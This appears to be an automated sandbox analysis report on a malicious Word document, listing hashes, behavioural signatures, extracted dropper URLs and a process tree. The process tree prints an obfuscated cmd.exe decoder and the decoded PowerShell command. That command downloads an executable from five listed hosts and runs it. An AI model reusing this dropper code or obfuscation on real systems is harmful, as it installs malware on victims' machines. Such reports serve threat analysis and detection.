Analysis

  • max time kernel
    101s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/09/2024, 13:29

General

  • Target

    edb04d2fa1f8dedd342114f0a59159dd_JaffaCakes118.doc

  • Size

    145KB

  • MD5

    edb04d2fa1f8dedd342114f0a59159dd

  • SHA1

    ab59b7c3d416535da465867ad06681ce25cf9241

  • SHA256

    b577e06275b467b6737bacb00414fef6cd9214f1ff15392f56b36543f0cadba1

  • SHA512

    c4eda85e4cad7db88e96d8d8d1da5f3b5eb2644345c6c9fb30d88854d5eabcfe9bdd3ed12ff08834084ebeb4205201879382c6010fc72284bd1f4c2033b2a7ca

  • SSDEEP

    3072:uYv8GhDS0o9zTGOZD6EbzCdLp4NKR/JZZ:uY1oUOZDlbeLmNKR/JZ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://antigua.aguilarnoticias.com/8ol4F4p

exe.dropper

http://prosolutionplusdiscount.com/gEEsqX5mU

exe.dropper

http://bunonartcrafts.com/6jUhzQa

exe.dropper

http://regenerationcongo.com/NVRODt7

exe.dropper

http://ghoulash.com/oHusH3kaO

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\edb04d2fa1f8dedd342114f0a59159dd_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4324
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2272
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c %ProGRamDAtA:~0,1%%PRogrAMdaTA:~9,2% /v:oN /c"Set xDl= CwcT\hB$k.-(Xx63e4zad'SfHM70ujAm@i;9lbP+vE/,VRLW{5ntN1qyIUrsp8YF)2~OGDo%g}:=Q&& fOr %5 IN ( 61 71 2 72 39 58 7 47 57 1 75 67 50 44 54 72 59 72 23 42 23 23 57 68 53 53 31 26 42 75 67 11 18 44 54 72 6 72 4 42 26 39 75 67 11 16 44 54 72 37 37 0 8 34 66 18 18 76 22 24 54 15 54 22 35 8 60 27 50 62 76 51 17 2 11 71 38 30 17 3 52 0 53 17 52 10 48 17 38 1 37 34 17 51 52 35 8 4 50 28 62 76 22 6 52 52 61 75 43 43 20 51 52 34 73 29 20 10 20 73 29 34 37 20 59 51 71 52 34 3 34 20 60 10 3 71 32 43 62 71 37 18 64 18 61 33 6 52 52 61 75 43 43 61 59 71 60 71 37 29 52 34 71 51 61 37 29 60 21 34 60 3 71 29 51 52 10 3 71 32 43 73 42 42 60 55 13 50 32 58 33 6 52 52 61 75 43 43 38 29 51 71 51 20 59 52 3 59 20 24 52 60 10 3 71 32 43 15 30 58 6 19 77 20 33 6 52 52 61 75 43 43 59 17 73 17 51 17 59 20 52 34 71 51 3 71 51 73 71 10 3 71 32 43 53 45 46 68 70 52 27 33 6 52 52 61 75 43 43 73 6 71 29 37 20 60 6 10 3 71 32 43 71 25 29 60 25 16 9 20 68 22 10 23 61 37 34 52 12 22 33 22 65 35 8 37 54 62 62 76 22 46 62 16 28 22 35 8 57 15 36 50 0 76 0 22 27 66 54 22 35 8 6 27 27 66 76 22 4 18 54 62 22 35 8 34 15 62 18 76 8 17 51 41 75 61 29 38 37 34 3 40 22 5 22 40 8 57 15 36 50 40 22 10 17 14 17 22 35 24 71 59 17 20 3 6 12 8 34 66 50 16 0 34 51 0 8 4 50 28 62 65 49 52 59 56 49 8 60 27 50 62 10 70 71 2 51 37 71 20 21 64 34 37 17 12 8 34 66 50 16 44 0 8 34 15 62 18 65 35 8 51 28 15 66 76 22 1 27 62 28 22 35 57 24 0 12 12 69 17 52 11 57 52 17 32 0 8 34 15 62 18 65 10 37 17 51 73 52 6 0 11 73 17 0 62 28 28 28 28 65 0 49 57 51 41 71 9 17 11 57 52 17 32 0 8 34 15 62 18 35 8 24 50 62 18 76 22 59 54 62 28 22 35 38 59 17 20 9 35 74 74 3 20 52 3 6 49 74 74 8 39 28 62 36 76 22 63 27 66 18 22 35 88) dO set aK=!aK!!xDl:~ %5, 1!&& if %5 == 88 eCHO !aK:~ -553! |FOR /F "tokens=1 delims=fk" %C IN ('ftype^^^|find "cm"')DO %C "
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:3508
        • C:\Windows\system32\cmd.exe
          CmD /v:oN /c"Set xDl= CwcT\hB$k.-(Xx63e4zad'SfHM70ujAm@i;9lbP+vE/,VRLW{5ntN1qyIUrsp8YF)2~OGDo%g}:=Q&& fOr %5 IN ( 61 71 2 72 39 58 7 47 57 1 75 67 50 44 54 72 59 72 23 42 23 23 57 68 53 53 31 26 42 75 67 11 18 44 54 72 6 72 4 42 26 39 75 67 11 16 44 54 72 37 37 0 8 34 66 18 18 76 22 24 54 15 54 22 35 8 60 27 50 62 76 51 17 2 11 71 38 30 17 3 52 0 53 17 52 10 48 17 38 1 37 34 17 51 52 35 8 4 50 28 62 76 22 6 52 52 61 75 43 43 20 51 52 34 73 29 20 10 20 73 29 34 37 20 59 51 71 52 34 3 34 20 60 10 3 71 32 43 62 71 37 18 64 18 61 33 6 52 52 61 75 43 43 61 59 71 60 71 37 29 52 34 71 51 61 37 29 60 21 34 60 3 71 29 51 52 10 3 71 32 43 73 42 42 60 55 13 50 32 58 33 6 52 52 61 75 43 43 38 29 51 71 51 20 59 52 3 59 20 24 52 60 10 3 71 32 43 15 30 58 6 19 77 20 33 6 52 52 61 75 43 43 59 17 73 17 51 17 59 20 52 34 71 51 3 71 51 73 71 10 3 71 32 43 53 45 46 68 70 52 27 33 6 52 52 61 75 43 43 73 6 71 29 37 20 60 6 10 3 71 32 43 71 25 29 60 25 16 9 20 68 22 10 23 61 37 34 52 12 22 33 22 65 35 8 37 54 62 62 76 22 46 62 16 28 22 35 8 57 15 36 50 0 76 0 22 27 66 54 22 35 8 6 27 27 66 76 22 4 18 54 62 22 35 8 34 15 62 18 76 8 17 51 41 75 61 29 38 37 34 3 40 22 5 22 40 8 57 15 36 50 40 22 10 17 14 17 22 35 24 71 59 17 20 3 6 12 8 34 66 50 16 0 34 51 0 8 4 50 28 62 65 49 52 59 56 49 8 60 27 50 62 10 70 71 2 51 37 71 20 21 64 34 37 17 12 8 34 66 50 16 44 0 8 34 15 62 18 65 35 8 51 28 15 66 76 22 1 27 62 28 22 35 57 24 0 12 12 69 17 52 11 57 52 17 32 0 8 34 15 62 18 65 10 37 17 51 73 52 6 0 11 73 17 0 62 28 28 28 28 65 0 49 57 51 41 71 9 17 11 57 52 17 32 0 8 34 15 62 18 35 8 24 50 62 18 76 22 59 54 62 28 22 35 38 59 17 20 9 35 74 74 3 20 52 3 6 49 74 74 8 39 28 62 36 76 22 63 27 66 18 22 35 88) dO set aK=!aK!!xDl:~ %5, 1!&& if %5 == 88 eCHO !aK:~ -553! |FOR /F "tokens=1 delims=fk" %C IN ('ftype^^^|find "cm"')DO %C "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4424
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" eCHO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $i244='f161';$s758=new-object Net.WebClient;$T508='http://antigua.aguilarnoticias.com/8ol4F4p@http://prosolutionplusdiscount.com/gEEsqX5mU@http://bunonartcrafts.com/6jUhzQa@http://regenerationcongo.com/NVRODt7@http://ghoulash.com/oHusH3kaO'.Split('@');$l188='R830';$I695 = '721';$h772='T418';$i684=$env:public+'\'+$I695+'.exe';foreach($i253 in $T508){try{$s758.DownloadFile($i253, $i684);$n062='C780';If ((Get-Item $i684).length -ge 80000) {Invoke-Item $i684;$f584='r180';break;}}catch{}}$P089='Y724'; "
            4⤵
              PID:4068
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1 delims=fk" %C IN ('ftype^|find "cm"') DO %C "
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4928
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ftype|find "cm"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1964
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" ftype"
                  6⤵
                    PID:1416
                  • C:\Windows\system32\find.exe
                    find "cm"
                    6⤵
                      PID:1840
                  • C:\Windows\system32\cmd.exe
                    cmd
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2988
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell $i244='f161';$s758=new-object Net.WebClient;$T508='http://antigua.aguilarnoticias.com/8ol4F4p@http://prosolutionplusdiscount.com/gEEsqX5mU@http://bunonartcrafts.com/6jUhzQa@http://regenerationcongo.com/NVRODt7@http://ghoulash.com/oHusH3kaO'.Split('@');$l188='R830';$I695 = '721';$h772='T418';$i684=$env:public+'\'+$I695+'.exe';foreach($i253 in $T508){try{$s758.DownloadFile($i253, $i684);$n062='C780';If ((Get-Item $i684).length -ge 80000) {Invoke-Item $i684;$f584='r180';break;}}catch{}}$P089='Y724';
                      6⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2212

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16EE2021.wmf

            Filesize

            502B

            MD5

            081b9678466bfb0383f78640fb58d185

            SHA1

            0a901e3014bad18f0e54e1566ad9ee27e15003b1

            SHA256

            2cf05803ce69b24b44f0c70831e007128c180d2840db6424040a6fae7844dee3

            SHA512

            aa756ae7d5ba68c6635b5c66c49e87921ef099eeca83ab652ed502d2e2e2cc598ea800636f79afacfdabce2d9697f9e4231225cff46b89dc5169d6832bc57a65

          • C:\Users\Admin\AppData\Local\Temp\TCDACBD.tmp\iso690.xsl

            Filesize

            263KB

            MD5

            ff0e07eff1333cdf9fc2523d323dd654

            SHA1

            77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

            SHA256

            3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

            SHA512

            b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t3htbic4.4sz.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/2212-61-0x000001F6EE490000-0x000001F6EE4B2000-memory.dmp

            Filesize

            136KB

          • memory/4324-6-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-17-0x00007FFE4C540000-0x00007FFE4C550000-memory.dmp

            Filesize

            64KB

          • memory/4324-12-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-11-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-13-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-15-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-14-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-9-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-8-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-7-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-3-0x00007FFE4EA50000-0x00007FFE4EA60000-memory.dmp

            Filesize

            64KB

          • memory/4324-5-0x00007FFE4EA50000-0x00007FFE4EA60000-memory.dmp

            Filesize

            64KB

          • memory/4324-16-0x00007FFE4C540000-0x00007FFE4C550000-memory.dmp

            Filesize

            64KB

          • memory/4324-10-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-4-0x00007FFE4EA50000-0x00007FFE4EA60000-memory.dmp

            Filesize

            64KB

          • memory/4324-0-0x00007FFE4EA50000-0x00007FFE4EA60000-memory.dmp

            Filesize

            64KB

          • memory/4324-1-0x00007FFE8EA6D000-0x00007FFE8EA6E000-memory.dmp

            Filesize

            4KB

          • memory/4324-66-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-67-0x00007FFE8EA6D000-0x00007FFE8EA6E000-memory.dmp

            Filesize

            4KB

          • memory/4324-68-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-69-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB

          • memory/4324-2-0x00007FFE4EA50000-0x00007FFE4EA60000-memory.dmp

            Filesize

            64KB

          • memory/4324-581-0x00007FFE4EA50000-0x00007FFE4EA60000-memory.dmp

            Filesize

            64KB

          • memory/4324-584-0x00007FFE4EA50000-0x00007FFE4EA60000-memory.dmp

            Filesize

            64KB

          • memory/4324-583-0x00007FFE4EA50000-0x00007FFE4EA60000-memory.dmp

            Filesize

            64KB

          • memory/4324-582-0x00007FFE4EA50000-0x00007FFE4EA60000-memory.dmp

            Filesize

            64KB

          • memory/4324-585-0x00007FFE8E9D0000-0x00007FFE8EBC5000-memory.dmp

            Filesize

            2.0MB